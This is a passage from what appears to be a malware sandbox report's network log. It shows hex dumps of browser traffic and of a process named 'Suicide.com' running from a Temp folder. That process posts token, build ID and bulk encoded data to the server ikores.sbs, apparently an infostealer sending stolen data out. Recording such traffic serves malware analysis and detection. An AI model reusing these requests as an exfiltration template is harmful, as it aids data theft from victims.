                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 32 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                    Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700332,3700949,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                    2024-12-06 08:42:19 UTC51INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 0d 0a
                                                                                                                                                                                    Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[
                                                                                                                                                                                    2024-12-06 08:42:19 UTC291INData Raw: 31 31 63 0d 0a 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d
                                                                                                                                                                                    Data Ascii: 11cd]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}}
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 38 30 30 30 0d 0a 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 48 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 5b 49 64 28 5c 22 64 61 74 61 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65
                                                                                                                                                                                    Data Ascii: 8000d#zClosurez\");_.Hd\u003dclass{constructor(a){this.ih\u003da}};_.Md\u003d[Id(\"data\"),Id(\"http\"),Id(\"https\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){re
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c
                                                                                                                                                                                    Data Ascii: 3dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.449839172.217.21.364437600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:19 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-12-06 08:42:19 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                    Version: 702228742
                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:19 GMT
                                                                                                                                                                                    Server: gws
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2024-12-06 08:42:19 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                    2024-12-06 08:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.4498595.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:23 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----NGVAAIE3W4EU37YMYCB1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:23 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------NGVAAIE3W4EU37YMYCB1Cont
                                                                                                                                                                                    2024-12-06 08:42:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:23 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.4498665.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:24 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----I5P8GL68GLN7YMY58900
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 213453
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 35 50 38 47 4c 36 38 47 4c 4e 37 59 4d 59 35 38 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 35 50 38 47 4c 36 38 47 4c 4e 37 59 4d 59 35 38 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 35 50 38 47 4c 36 38 47 4c 4e 37 59 4d 59 35 38 39 30 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------I5P8GL68GLN7YMY58900Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------I5P8GL68GLN7YMY58900Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------I5P8GL68GLN7YMY58900Cont
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                    Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
